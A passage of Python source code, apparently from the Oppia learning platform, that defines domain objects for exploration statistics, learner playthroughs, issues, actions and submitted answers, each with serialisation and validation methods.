self.num_completions_v2 = num_completions_v2
self.state_stats_mapping = state_stats_mapping
@property
def num_starts(self):
"""Returns the number of learners who started the exploration.
Returns:
int. The number of learners who started the exploration.
"""
return self.num_starts_v1 + self.num_starts_v2
@property
def num_actual_starts(self):
"""Returns the number of learners who actually attempted the
exploration. These are the learners who have completed the initial
state of the exploration and traversed to the next state.
Returns:
int. The number of learners who actually attempted
the exploration.
"""
return self.num_actual_starts_v1 + self.num_actual_starts_v2
@property
def num_completions(self):
"""Returns the number of learners who completed the exploration.
Returns:
int. The number of learners who completed the exploration.
"""
return self.num_completions_v1 + self.num_completions_v2
def to_dict(self):
"""Returns a dict representation of the domain object."""
state_stats_mapping_dict = {}
for state_name in self.state_stats_mapping:
state_stats_mapping_dict[state_name] = self.state_stats_mapping[
state_name].to_dict()
exploration_stats_dict = {
'exp_id': self.exp_id,
'exp_version': self.exp_version,
'num_starts_v1': self.num_starts_v1,
'num_starts_v2': self.num_starts_v2,
'num_actual_starts_v1': self.num_actual_starts_v1,
'num_actual_starts_v2': self.num_actual_starts_v2,
'num_completions_v1': self.num_completions_v1,
'num_completions_v2': self.num_completions_v2,
'state_stats_mapping': state_stats_mapping_dict
}
return exploration_stats_dict
def to_frontend_dict(self):
"""Returns a dict representation of the domain object for use in the
frontend.
"""
state_stats_mapping_dict = {}
for state_name in self.state_stats_mapping:
state_stats_mapping_dict[state_name] = self.state_stats_mapping[
state_name].to_frontend_dict()
exploration_stats_dict = {
'exp_id': self.exp_id,
'exp_version': self.exp_version,
'num_starts': self.num_starts,
'num_actual_starts': self.num_actual_starts,
'num_completions': self.num_completions,
'state_stats_mapping': state_stats_mapping_dict
}
return exploration_stats_dict
@classmethod
def create_default(cls, exp_id, exp_version, state_stats_mapping):
"""Creates a ExplorationStats domain object and sets all properties to
0.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
state_stats_mapping: dict. A dict mapping state names to their
corresponding StateStats.
Returns:
ExplorationStats. The exploration stats domain object.
"""
return cls(exp_id, exp_version, 0, 0, 0, 0, 0, 0, state_stats_mapping)
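# Illustrative usage (hypothetical exploration ID, version and state name):
#
#     exp_stats = ExplorationStats.create_default(
#         'exp_id_0', 1, {'Introduction': StateStats.create_default()})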
def get_sum_of_first_hit_counts(self):
"""Compute the sum of first hit counts for the exploration stats.
Returns:
int. Sum of first hit counts.
"""
sum_first_hits = 0
for state_name in self.state_stats_mapping:
state_stats = self.state_stats_mapping[state_name]
sum_first_hits += state_stats.first_hit_count
return sum_first_hits
def validate(self):
"""Validates the ExplorationStats domain object."""
exploration_stats_properties = [
'num_starts_v1',
'num_starts_v2',
'num_actual_starts_v1',
'num_actual_starts_v2',
'num_completions_v1',
'num_completions_v2',
]
if not isinstance(self.exp_id, basestring):
raise utils.ValidationError(
'Expected exp_id to be a string, received %s' % (self.exp_id))
if not isinstance(self.exp_version, int):
raise utils.ValidationError(
'Expected exp_version to be an int, received %s' % (
self.exp_version))
exploration_stats_dict = self.to_dict()
for stat_property in exploration_stats_properties:
if not isinstance(exploration_stats_dict[stat_property], int):
raise utils.ValidationError(
'Expected %s to be an int, received %s' % (
stat_property, exploration_stats_dict[stat_property]))
if exploration_stats_dict[stat_property] < 0:
raise utils.ValidationError(
'%s cannot have negative values' % (stat_property))
if not isinstance(self.state_stats_mapping, dict):
raise utils.ValidationError(
'Expected state_stats_mapping to be a dict, received %s' % (
self.state_stats_mapping))
class StateStats(object):
"""Domain object representing analytics data for an exploration's state.
Instances of these domain objects pertain to the exploration ID and version
as well.
"""
def __init__(
self, total_answers_count_v1, total_answers_count_v2,
useful_feedback_count_v1, useful_feedback_count_v2,
total_hit_count_v1, total_hit_count_v2, first_hit_count_v1,
first_hit_count_v2, num_times_solution_viewed_v2,
num_completions_v1, num_completions_v2):
"""Constructs a StateStats domain object.
Args:
total_answers_count_v1: int. Total number of answers submitted to
this state.
total_answers_count_v2: int. As above, but for events with version
2.
useful_feedback_count_v1: int. Total number of answers that received
useful feedback.
useful_feedback_count_v2: int. As above, but for events with version
2.
total_hit_count_v1: int. Total number of times the state was
entered.
total_hit_count_v2: int. As above, but for events with version 2.
first_hit_count_v1: int. Number of times the state was entered for
the first time.
first_hit_count_v2: int. As above, but for events with version 2.
num_times_solution_viewed_v2: int. Number of times the solution
button was triggered to answer a state (only for version 2).
num_completions_v1: int. Number of times the state was completed.
num_completions_v2: int. As above, but for events with version 2.
"""
self.total_answers_count_v1 = total_answers_count_v1
self.total_answers_count_v2 = total_answers_count_v2
self.useful_feedback_count_v1 = useful_feedback_count_v1
self.useful_feedback_count_v2 = useful_feedback_count_v2
self.total_hit_count_v1 = total_hit_count_v1
self.total_hit_count_v2 = total_hit_count_v2
self.first_hit_count_v1 = first_hit_count_v1
self.first_hit_count_v2 = first_hit_count_v2
# Solution view analytics were only introduced in v2, and there are no
# existing event models in v1 that record solution viewed events.
self.num_times_solution_viewed_v2 = num_times_solution_viewed_v2
self.num_completions_v1 = num_completions_v1
self.num_completions_v2 = num_completions_v2
@property
def total_answers_count(self):
"""Returns the total number of answers submitted to this state.
Returns:
int. The total number of answers submitted to this state.
"""
return self.total_answers_count_v1 + self.total_answers_count_v2
@property
def useful_feedback_count(self):
"""Returns the total number of answers that received useful feedback.
Returns:
int. The total number of answers that received useful feedback.
"""
return self.useful_feedback_count_v1 + self.useful_feedback_count_v2
@property
def total_hit_count(self):
"""Returns the total number of times the state was entered.
Returns:
int. The total number of times the state was entered.
"""
return self.total_hit_count_v1 + self.total_hit_count_v2
@property
def first_hit_count(self):
"""Returns the number of times the state was entered for the first time.
Returns:
int. The number of times the state was entered for the first time.
"""
return self.first_hit_count_v1 + self.first_hit_count_v2
@property
def num_completions(self):
"""Returns total number of times the state was completed.
Returns:
int. The total number of times the state was completed.
"""
return self.num_completions_v1 + self.num_completions_v2
@property
def num_times_solution_viewed(self):
"""Returns the number of times the solution button was triggered.
Returns:
int. Number of times the solution button was triggered to answer a
state only for events for schema version 2.
"""
return self.num_times_solution_viewed_v2
@classmethod
def create_default(cls):
"""Creates a StateStats domain object and sets all properties to 0."""
return cls(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
def to_dict(self):
"""Returns a dict representation of the domain object."""
state_stats_dict = {
'total_answers_count_v1': self.total_answers_count_v1,
'total_answers_count_v2': self.total_answers_count_v2,
'useful_feedback_count_v1': self.useful_feedback_count_v1,
'useful_feedback_count_v2': self.useful_feedback_count_v2,
'total_hit_count_v1': self.total_hit_count_v1,
'total_hit_count_v2': self.total_hit_count_v2,
'first_hit_count_v1': self.first_hit_count_v1,
'first_hit_count_v2': self.first_hit_count_v2,
'num_times_solution_viewed_v2': (
self.num_times_solution_viewed_v2),
'num_completions_v1': self.num_completions_v1,
'num_completions_v2': self.num_completions_v2
}
return state_stats_dict
def to_frontend_dict(self):
"""Returns a dict representation of the domain object for use in the
frontend.
"""
state_stats_dict = {
'total_answers_count': self.total_answers_count,
'useful_feedback_count': self.useful_feedback_count,
'total_hit_count': self.total_hit_count,
'first_hit_count': self.first_hit_count,
'num_times_solution_viewed': self.num_times_solution_viewed,
'num_completions': self.num_completions
}
return state_stats_dict
@classmethod
def from_dict(cls, state_stats_dict):
"""Constructs a StateStats domain object from a dict."""
return cls(
state_stats_dict['total_answers_count_v1'],
state_stats_dict['total_answers_count_v2'],
state_stats_dict['useful_feedback_count_v1'],
state_stats_dict['useful_feedback_count_v2'],
state_stats_dict['total_hit_count_v1'],
state_stats_dict['total_hit_count_v2'],
state_stats_dict['first_hit_count_v1'],
state_stats_dict['first_hit_count_v2'],
state_stats_dict['num_times_solution_viewed_v2'],
state_stats_dict['num_completions_v1'],
state_stats_dict['num_completions_v2']
)
def validate(self):
"""Validates the StateStats domain object."""
state_stats_properties = [
'total_answers_count_v1',
'total_answers_count_v2',
'useful_feedback_count_v1',
'useful_feedback_count_v2',
'total_hit_count_v1',
'total_hit_count_v2',
'first_hit_count_v1',
'first_hit_count_v2',
'num_times_solution_viewed_v2',
'num_completions_v1',
'num_completions_v2'
]
state_stats_dict = self.to_dict()
for stat_property in state_stats_properties:
if not isinstance(state_stats_dict[stat_property], int):
raise utils.ValidationError(
'Expected %s to be an int, received %s' % (
stat_property, state_stats_dict[stat_property]))
if state_stats_dict[stat_property] < 0:
raise utils.ValidationError(
'%s cannot have negative values' % (stat_property))
class ExplorationIssues(object):
"""Domain object representing the exploration to issues mapping for an
exploration.
"""
def __init__(self, exp_id, exp_version, unresolved_issues):
"""Constructs an ExplorationIssues domain object.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
unresolved_issues: list(ExplorationIssue). List of exploration
issues.
"""
self.exp_id = exp_id
self.exp_version = exp_version
self.unresolved_issues = unresolved_issues
@classmethod
def create_default(cls, exp_id, exp_version):
"""Creates a default ExplorationIssues domain object.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
Returns:
ExplorationIssues. The exploration issues domain object.
"""
return cls(exp_id, exp_version, [])
def to_dict(self):
"""Returns a dict representation of the ExplorationIssues domain object.
Returns:
dict. A dict mapping of all fields of ExplorationIssues object.
"""
unresolved_issue_dicts = [
unresolved_issue.to_dict()
for unresolved_issue in self.unresolved_issues]
return {
'exp_id': self.exp_id,
'exp_version': self.exp_version,
'unresolved_issues': unresolved_issue_dicts
}
@classmethod
def from_dict(cls, exp_issues_dict):
"""Returns an ExplorationIssues object from a dict.
Args:
exp_issues_dict: dict. A dict mapping of all fields of
ExplorationIssues object.
Returns:
ExplorationIssues. The corresponding ExplorationIssues domain
object.
"""
unresolved_issues = [
ExplorationIssue.from_dict(unresolved_issue_dict)
for unresolved_issue_dict in exp_issues_dict['unresolved_issues']]
return cls(
exp_issues_dict['exp_id'], exp_issues_dict['exp_version'],
unresolved_issues)
def validate(self):
"""Validates the ExplorationIssues domain object."""
if not isinstance(self.exp_id, basestring):
raise utils.ValidationError(
'Expected exp_id to be a string, received %s' % type(
self.exp_id))
if not isinstance(self.exp_version, int):
raise utils.ValidationError(
'Expected exp_version to be an int, received %s' % type(
self.exp_version))
if not isinstance(self.unresolved_issues, list):
raise utils.ValidationError(
'Expected unresolved_issues to be a list, received %s' % (
type(self.unresolved_issues)))
for issue in self.unresolved_issues:
issue.validate()
class Playthrough(object):
"""Domain object representing a learner playthrough.
"""
def __init__(
self, exp_id, exp_version, issue_type, issue_customization_args,
actions):
"""Constructs a Playthrough domain object.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
issue_type: str. Type of the issue.
issue_customization_args: dict. The customization args dict for the
given issue_type.
actions: list(LearnerAction). List of playthrough learner actions.
"""
self.exp_id = exp_id
self.exp_version = exp_version
self.issue_type = issue_type
self.issue_customization_args = issue_customization_args
self.actions = actions
def to_dict(self):
"""Returns a dict representation of the Playthrough domain object.
Returns:
dict. A dict mapping of all fields of Playthrough object.
"""
action_dicts = [action.to_dict() for action in self.actions]
return {
'exp_id': self.exp_id,
'exp_version': self.exp_version,
'issue_type': self.issue_type,
'issue_customization_args': self.issue_customization_args,
'actions': action_dicts,
}
@classmethod
def from_dict(cls, playthrough_dict):
"""Returns a Playthrough object from a dict.
Args:
playthrough_dict: dict. A dict mapping of all fields of Playthrough
object.
Returns:
Playthrough. The corresponding Playthrough domain object.
"""
actions = [
LearnerAction.from_dict(action_dict)
for action_dict in playthrough_dict['actions']]
return cls(
playthrough_dict['exp_id'],
playthrough_dict['exp_version'],
playthrough_dict['issue_type'],
playthrough_dict['issue_customization_args'],
actions)
@classmethod
def from_backend_dict(cls, playthrough_data):
"""Checks whether the playthrough dict has the correct keys and then
returns a domain object instance.
Args:
playthrough_data: dict. Dict representing a playthrough.
Returns:
Playthrough. A playthrough domain object.
"""
playthrough_properties = [
'exp_id', 'exp_version', 'issue_type',
'issue_customization_args', 'actions']
for playthrough_property in playthrough_properties:
if playthrough_property not in playthrough_data:
raise utils.ValidationError(
'%s not in playthrough data dict.' % (
playthrough_property))
actions = [
LearnerAction.from_dict(action_dict)
for action_dict in playthrough_data['actions']]
playthrough = cls(
playthrough_data['exp_id'],
playthrough_data['exp_version'],
playthrough_data['issue_type'],
playthrough_data['issue_customization_args'],
actions)
playthrough.validate()
return playthrough
def validate(self):
"""Validates the Playthrough domain object."""
if not isinstance(self.exp_id, basestring):
raise utils.ValidationError(
'Expected exp_id to be a string, received %s' % type(
self.exp_id))
if not isinstance(self.exp_version, int):
raise utils.ValidationError(
'Expected exp_version to be an int, received %s' % (
type(self.exp_version)))
if not isinstance(self.issue_type, basestring):
raise utils.ValidationError(
'Expected issue_type to be a string, received %s' % type(
self.issue_type))
if not isinstance(self.issue_customization_args, dict):
raise utils.ValidationError(
'Expected issue_customization_args to be a dict, '
'received %s' % (
type(self.issue_customization_args)))
try:
issue = issue_registry.Registry.get_issue_by_type(
self.issue_type)
except KeyError:
raise utils.ValidationError('Invalid issue type: %s' % (
self.issue_type))
exp_domain.validate_customization_args_and_values(
'issue', self.issue_type, self.issue_customization_args,
issue.customization_arg_specs)
if not isinstance(self.actions, list):
raise utils.ValidationError(
'Expected actions to be a list, received %s' % (
type(self.actions)))
for action in self.actions:
action.validate()
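# A minimal usage sketch for the Playthrough class above (illustrative only:
# the issue type and its customization args are hypothetical and must match a
# type registered in issue_registry for validate() to pass):
#
#     playthrough = Playthrough.from_backend_dict({
#         'exp_id': 'exp_1',
#         'exp_version': 1,
#         'issue_type': 'EarlyQuit',
#         'issue_customization_args': {
#             'state_name': {'value': 'Introduction'},
#             'time_spent_in_exp_in_msecs': {'value': 1000},
#         },
#         'actions': [],
#     })
#
# from_backend_dict() checks that all required keys are present and calls
# validate() before returning the domain object.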
class ExplorationIssue(object):
"""Domain object representing an exploration issue."""
def __init__(
self, issue_type, issue_customization_args, playthrough_ids,
schema_version, is_valid):
"""Constructs an ExplorationIssue domain object.
Args:
issue_type: str. Type of the issue.
issue_customization_args: dict. The customization dict. The keys are
names of customization_args and the values are dicts with a
single key, 'value', whose corresponding value is the value of
the customization arg.
playthrough_ids: list(str). List of playthrough IDs.
schema_version: int. Schema version for the exploration issue.
is_valid: bool. Whether the issue and the associated playthroughs
are valid.
"""
self.issue_type = issue_type
self.issue_customization_args = issue_customization_args
self.playthrough_ids = playthrough_ids
self.schema_version = schema_version
self.is_valid = is_valid
def to_dict(self):
"""Returns a dict representation of the ExplorationIssue domain object.
Returns:
dict. A dict mapping of all fields of ExplorationIssue object.
"""
return {
'issue_type': self.issue_type,
'issue_customization_args': exp_domain.get_full_customization_args(
self.issue_customization_args,
issue_registry.Registry.get_issue_by_type(
self.issue_type).customization_arg_specs),
'playthrough_ids': self.playthrough_ids,
'schema_version': self.schema_version,
'is_valid': self.is_valid
}
@classmethod
def from_dict(cls, issue_dict):
"""Returns an ExplorationIssue object from a dict.
Args:
issue_dict: dict. A dict mapping of all fields of ExplorationIssue
object.
Returns:
ExplorationIssue. The corresponding ExplorationIssue domain object.
"""
return cls(
issue_dict['issue_type'],
issue_dict['issue_customization_args'],
issue_dict['playthrough_ids'],
issue_dict['schema_version'],
issue_dict['is_valid'])
@classmethod
def from_backend_dict(cls, exp_issue_dict):
"""Checks whether the exploration issue dict has the correct keys and
then returns a domain object instance.
Args:
exp_issue_dict: dict. Dict representing an exploration issue.
Returns:
ExplorationIssue. The exploration issue domain object.
"""
exp_issue_properties = [
'issue_type', 'schema_version', 'issue_customization_args',
'playthrough_ids', 'is_valid']
for exp_issue_property in exp_issue_properties:
if exp_issue_property not in exp_issue_dict:
raise utils.ValidationError(
'%s not in exploration issue dict.' % (exp_issue_property))
dummy_exp_issue = cls(
exp_issue_dict['issue_type'],
exp_issue_dict['issue_customization_args'], [],
exp_issue_dict['schema_version'], exp_issue_dict['is_valid'])
dummy_exp_issue.validate()
return dummy_exp_issue
@classmethod
def update_exp_issue_from_model(cls, issue_dict):
"""Converts the exploration issue blob given from
current issue_schema_version to current issue_schema_version + 1.
Note that the issue_dict being passed in is modified in-place.
Args:
issue_dict: dict. Dict representing the ExplorationIssue object.
"""
current_issue_schema_version = issue_dict['schema_version']
issue_dict['schema_version'] += 1
conversion_fn = getattr(cls, '_convert_issue_v%s_dict_to_v%s_dict' % (
current_issue_schema_version, current_issue_schema_version + 1))
issue_dict = conversion_fn(issue_dict)
@classmethod
def _convert_issue_v1_dict_to_v2_dict(cls, issue_dict):
"""Converts a v1 issue dict to a v2 issue dict. This function is now
implemented only for testing purposes and must be rewritten when an
actual schema migration from v1 to v2 takes place.
"""
raise NotImplementedError
def validate(self):
"""Validates the ExplorationIssue domain object."""
if not isinstance(self.issue_type, basestring):
raise utils.ValidationError(
'Expected issue_type to be a string, received %s' % (
type(self.issue_type)))
if not isinstance(self.schema_version, int):
raise utils.ValidationError(
'Expected schema_version to be an int, received %s' % (
type(self.schema_version)))
try:
issue = issue_registry.Registry.get_issue_by_type(
self.issue_type)
except KeyError:
raise utils.ValidationError('Invalid issue type: %s' % (
self.issue_type))
exp_domain.validate_customization_args_and_values(
'issue', self.issue_type, self.issue_customization_args,
issue.customization_arg_specs)
if not isinstance(self.playthrough_ids, list):
raise utils.ValidationError(
'Expected playthrough_ids to be a list, received %s' % (
type(self.playthrough_ids)))
for playthrough_id in self.playthrough_ids:
if not isinstance(playthrough_id, basestring):
raise utils.ValidationError(
'Expected each playthrough_id to be a string, received '
'%s' % type(playthrough_id))
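# The update_exp_issue_from_model() hook above dispatches by name to
# _convert_issue_v<from>_dict_to_v<to>_dict classmethods. A hypothetical sketch
# of what an actual v1 -> v2 conversion could look like (the renamed field is
# illustrative, not part of any real schema):
#
#     @classmethod
#     def _convert_issue_v1_dict_to_v2_dict(cls, issue_dict):
#         issue_dict['is_valid'] = issue_dict.pop('valid', True)
#         return issue_dict
#
# Since update_exp_issue_from_model() ignores the conversion function's return
# value, conversions must mutate issue_dict in-place, as the docstring notes.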
class LearnerAction(object):
"""Domain object representing a learner action."""
def __init__(self, action_type, action_customization_args, schema_version):
"""Constructs a LearnerAction domain object.
Args:
action_type: str. Type of the action.
action_customization_args: dict. The customization dict. The keys
are names of customization_args and the values are dicts with a
single key, 'value', whose corresponding value is the value of
the customization arg.
schema_version: int. Schema version for the learner action.
"""
self.action_type = action_type
self.action_customization_args = action_customization_args
self.schema_version = schema_version
def to_dict(self):
"""Returns a dict representation of the LearnerAction domain object.
Returns:
dict. A dict mapping of all fields of LearnerAction object.
"""
return {
'action_type': self.action_type,
'action_customization_args': exp_domain.get_full_customization_args(
self.action_customization_args,
action_registry.Registry.get_action_by_type(
self.action_type).customization_arg_specs),
'schema_version': self.schema_version
}
@classmethod
def from_dict(cls, action_dict):
"""Returns a LearnerAction object from a dict.
Args:
action_dict: dict. A dict mapping of all fields of LearnerAction
object.
Returns:
LearnerAction. The corresponding LearnerAction domain object.
"""
return cls(
action_dict['action_type'],
action_dict['action_customization_args'],
action_dict['schema_version'])
@classmethod
def update_learner_action_from_model(cls, action_dict):
"""Converts the learner action blob given from
current action_schema_version to current action_schema_version + 1.
Note that the action_dict being passed in is modified in-place.
Args:
action_dict: dict. Dict representing the LearnerAction object.
"""
current_action_schema_version = action_dict['schema_version']
action_dict['schema_version'] += 1
conversion_fn = getattr(cls, '_convert_action_v%s_dict_to_v%s_dict' % (
current_action_schema_version, current_action_schema_version + 1))
action_dict = conversion_fn(action_dict)
@classmethod
def _convert_action_v1_dict_to_v2_dict(cls, action_dict):
"""Converts a v1 action dict to a v2 action dict. This function is now
implemented only for testing purposes and must be rewritten when an
actual schema migration from v1 to v2 takes place.
"""
raise NotImplementedError
def validate(self):
"""Validates the LearnerAction domain object."""
if not isinstance(self.action_type, basestring):
raise utils.ValidationError(
'Expected action_type to be a string, received %s' % (
type(self.action_type)))
if not isinstance(self.schema_version, int):
raise utils.ValidationError(
'Expected schema_version to be an int, received %s' % (
type(self.schema_version)))
try:
action = action_registry.Registry.get_action_by_type(
self.action_type)
except KeyError:
raise utils.ValidationError(
'Invalid action type: %s' % self.action_type)
exp_domain.validate_customization_args_and_values(
'action', self.action_type, self.action_customization_args,
action.customization_arg_specs)
# TODO(bhenning): Monitor sizes (lengths of submitted_answer_list) of these
# objects and determine if we should enforce an upper bound for
# submitted_answer_list.
class StateAnswers(object):
"""Domain object containing answers submitted to an exploration state."""
def __init__(
self, exploration_id, exploration_version, state_name,
interaction_id, submitted_answer_list,
schema_version=feconf.CURRENT_STATE_ANSWERS_SCHEMA_VERSION):
"""Constructs a StateAnswers domain object.
Args:
exploration_id: str. The ID of the exploration corresponding to submitted
answers.
exploration_version: int. The version of the exploration corresponding to
submitted answers.
state_name: str. The name of the state to which the answers were submitted.
interaction_id: str. The ID of the interaction which created the answers.
submitted_answer_list: list(SubmittedAnswer). The list of SubmittedAnswer
domain objects that were submitted to the exploration and version
specified in this object.
schema_version: int. The schema version of this answers object.
"""
self.exploration_id = exploration_id
self.exploration_version = exploration_version
self.state_name = state_name
self.interaction_id = interaction_id
self.submitted_answer_list = submitted_answer_list
self.schema_version = schema_version
def get_submitted_answer_dict_list(self):
"""Returns the submitted_answer_list stored within this object as a list
of SubmittedAnswer dicts.
"""
return [state_answer.to_dict()
for state_answer in self.submitted_answer_list]
def validate(self):
"""Validates StateAnswers domain object entity."""
if not isinstance(self.exploration_id, basestring):
raise utils.ValidationError(
'Expected exploration_id to be a string, received %s' % str(
self.exploration_id))
if not isinstance(self.state_name, basestring):
raise utils.ValidationError(
'Expected state_name to be a string, received %s' % str(
self.state_name))
if self.interaction_id is not None:
if not isinstance(self.interaction_id, basestring):
raise utils.ValidationError(
'Expected interaction_id to be a string, received %s' % str(
self.interaction_id))
# Verify interaction_id is valid.
if (self.interaction_id not in
interaction_registry.Registry.get_all_interaction_ids()):
raise utils.ValidationError(
'Unknown interaction_id: %s' % self.interaction_id)
if not isinstance(self.submitted_answer_list, list):
raise utils.ValidationError(
'Expected submitted_answer_list to be a list, received %s' %
str(self.submitted_answer_list))
if not isinstance(self.schema_version, int):
raise utils.ValidationError(
'Expected schema_version to be an integer, received %s' % str(
self.schema_version))
if self.schema_version < 1:
raise utils.ValidationError(
'schema_version < 1: %d' % self.schema_version)
if self.schema_version > feconf.CURRENT_STATE_ANSWERS_SCHEMA_VERSION:
raise utils.ValidationError(
'schema_version > feconf.CURRENT_STATE_ANSWERS_SCHEMA_VERSION '
'(%d): %d' % (
feconf.CURRENT_STATE_ANSWERS_SCHEMA_VERSION,
self.schema_version))
class SubmittedAnswer(object):
"""Domain object representing an answer submitted to a state."""
# NOTE TO DEVELOPERS: do not use the rule_spec_str and answer_str
# parameters; they are only populated by the answer migration job. They only
# represent context that is lost as part of the answer migration and are
# used as part of validating the migration was correct. They may be
# referenced in future migration or mapreduce jobs, or they may be removed
# without warning or migration.
def __init__(
self, answer, interaction_id, answer_group_index,
rule_spec_index, classification_categorization, params,
session_id, time_spent_in_sec, rule_spec_str=None,
answer_str=None):
self.answer = answer
self.interaction_id = interaction_id
self.answer_group_index = answer_group_index
self.rule_spec_index = rule_spec_index
self.classification_categorization = classification_categorization
self.params = params
self.session_id = session_id
self.time_spent_in_sec = time_spent_in_sec
self.rule_spec_str = rule_spec_str
self.answer_str = answer_str
def to_dict(self):
"""Returns the dict of submitted answer.
Returns:
dict. The submitted answer dict.
"""
submitted_answer_dict = {
'answer': self.answer,
'interaction_id': self.interaction_id,
'answer_group_index': self.answer_group_index,
'rule_spec_index': self.rule_spec_index,
'classification_categorization': self.classification_categorization,
'params': self.params,
'session_id': self.session_id,
'time_spent_in_sec': self.time_spent_in_sec,
}
if self.rule_spec_str is not None:
submitted_answer_dict['rule_spec_str'] = self.rule_spec_str
if self.answer_str is not None:
submitted_answer_dict['answer_str'] = self.answer_str
return submitted_answer_dict
@classmethod
def from_dict(cls, submitted_answer_dict):
"""Returns the domain object representing an answer submitted to a
state.
Returns:
SubmittedAnswer. The SubmittedAnswer domain object.
"""
return cls(
submitted_answer_dict['answer'],
submitted_answer_dict['interaction_id'],
submitted_answer_dict['answer_group_index'],
submitted_answer_dict['rule_spec_index'],
submitted_answer_dict['classification_categorization'],
submitted_answer_dict['params'],
submitted_answer_dict['session_id'],
submitted_answer_dict['time_spent_in_sec'],
rule_spec_str=submitted_answer_dict.get('rule_spec_str'),
answer_str=submitted_answer_dict.get('answer_str'))
def validate(self):
"""Validates this submitted answer object."""
# TODO(bhenning): Validate the normalized answer against future answer
# objects after #956 is addressed.
if self.time_spent_in_sec is None:
raise utils.ValidationError(
'SubmittedAnswers must have a provided time_spent_in_sec')
if self.session_id is None:
raise utils.ValidationError(
'SubmittedAnswers must have a provided session_id')
if self.rule_spec_str is not None and not isinstance(
self.rule_spec_str, basestring):
raise utils.ValidationError(
'Expected rule_spec_str to be either None or a string, '
'received %s' % str(self.rule_spec_str))
if self.answer_str is not None and not isinstance(
self.answer_str, basestring):
raise utils.ValidationError(
'Expected answer_str to be either None or a string, received '
'%s' % str(self.answer_str))
if not isinstance(self.session_id, basestring):
raise utils.ValidationError(
'Expected session_id to be a string, received %s' %
str(self.session_id))
if not isinstance(self.time_spent_in_sec, numbers.Number):
raise utils.ValidationError(
'Expected time_spent_in_sec to be a number, received %s' %
str(self.time_spent_in_sec))
if not isinstance(self.params, dict):
raise utils.ValidationError(
'Expected params to be a dict, received %s' % str(self.params))
if not isinstance(self.answer_group_index, int):
raise utils.ValidationError(
'Expected answer_group_index to be an integer, received %s' %
str(self.answer_group_index))
if self.rule_spec_index is not None and not (
isinstance(self.rule_spec_index, int)):
raise utils.ValidationError(
'Expected rule_spec_index to be an integer, received %s' %
str(self.rule_spec_index))
if self.answer_group_index < 0:
raise utils.ValidationError(
'Expected answer_group_index to be non-negative, received %d' %
self.answer_group_index)
if self.rule_spec_index is not None and self.rule_spec_index < 0:
raise utils.ValidationError(
'Expected rule_spec_index to be non-negative, received %d' %
self.rule_spec_index)
if self.time_spent_in_sec < 0.:
raise utils.ValidationError(
'Expected time_spent_in_sec to be non-negative, received %f' %
self.time_spent_in_sec)
if self.answer is None and (
self.interaction_id not in feconf.LINEAR_INTERACTION_IDS):
raise utils.ValidationError(
'SubmittedAnswers must have a provided answer except for '
'linear interactions')
valid_classification_categories = [
exp_domain.EXPLICIT_CLASSIFICATION,
exp_domain.TRAINING_DATA_CLASSIFICATION,
exp_domain.STATISTICAL_CLASSIFICATION,
exp_domain.DEFAULT_OUTCOME_CLASSIFICATION]
if self.classification_categorization not in (
valid_classification_categories):
raise utils.ValidationError(
'Expected valid classification_categorization, received %s' %
self.classification_categorization)
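# Illustrative round-trip for SubmittedAnswer (the answer payload and session
# values are hypothetical; the answer format depends on the interaction type):
#
#     answer = SubmittedAnswer(
#         'Hello', 'TextInput', 0, 0, exp_domain.EXPLICIT_CLASSIFICATION,
#         {}, 'session_1', 2.5)
#     answer.validate()
#     assert SubmittedAnswer.from_dict(answer.to_dict()).to_dict() == (
#         answer.to_dict())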
class AnswerOccurrence(object):
"""Domain object that represents a specific answer that occurred some number
of times.
"""
def __init__(self, answer, frequency):
"""Initialize domain object for answer occurrences."""
self.answer = answer
self.frequency = frequency
def to_raw_type(self):
"""Returns a Python dict representing the specific answer.
Returns:
dict. The specific answer dict in the following format:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
"""
return {
'answer': self.answer,
'frequency': self.frequency
}
@classmethod
def from_raw_type(cls, answer_occurrence_dict):
"""Returns domain object that represents a specific answer that occurred
some number of times.
Args:
answer_occurrence_dict: dict. The specific answer dict in the
following format:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
Returns:
AnswerOccurrence. The AnswerOccurrence domain object.
"""
return cls(
answer_occurrence_dict['answer'],
answer_occurrence_dict['frequency'])
class AnswerCalculationOutput(object):
"""Domain object superclass that represents the output of an answer
calculation.
"""
def __init__(self, calculation_output_type):
self.calculation_output_type = calculation_output_type
class AnswerFrequencyList(AnswerCalculationOutput):
"""Domain object that represents an output list of AnswerOccurrences."""
def __init__(self, answer_occurrences=None):
"""Initialize domain object for answer frequency list for a given list
of AnswerOccurrence objects (default is empty list).
"""
super(AnswerFrequencyList, self).__init__(
CALC_OUTPUT_TYPE_ANSWER_FREQUENCY_LIST)
self.answer_occurrences = (
answer_occurrences if answer_occurrences else [])
def to_raw_type(self):
"""Returns the answer occurrences list with each answer represented as
a Python dict.
Returns:
list(dict). A list of answer occurrence dicts. Each dict has the
following format:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
"""
return [
answer_occurrence.to_raw_type()
for answer_occurrence in self.answer_occurrences]
@classmethod
def from_raw_type(cls, answer_occurrence_list):
"""Creates a domain object that represents an output list of
AnswerOccurrences.
Args:
answer_occurrence_list: list(dict). A list containing answer
occurrence dicts in the following format:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
Returns:
AnswerFrequencyList. The domain object for answer occurrences list.
"""
return cls([
AnswerOccurrence.from_raw_type(answer_occurrence_dict)
for answer_occurrence_dict in answer_occurrence_list])
class CategorizedAnswerFrequencyLists(AnswerCalculationOutput):
"""AnswerFrequencyLists that are categorized based on arbitrary
categories.
"""
def __init__(self, categorized_answer_freq_lists=None):
"""Initialize domain object for categorized answer frequency lists for
a given dict (default is empty).
"""
super(CategorizedAnswerFrequencyLists, self).__init__(
CALC_OUTPUT_TYPE_CATEGORIZED_ANSWER_FREQUENCY_LISTS)
self.categorized_answer_freq_lists = (
categorized_answer_freq_lists
if categorized_answer_freq_lists else {})
def to_raw_type(self):
"""Returns the categorized frequency Python dict.
Returns:
dict. A dict whose keys are category names and whose corresponding
values are lists of answer frequency dicts. Each answer
frequency dict has the following keys and values:
{
'answer': *. The answer submitted by the learner.
'frequency': int. The number of occurrences of the answer.
}
"""
return {
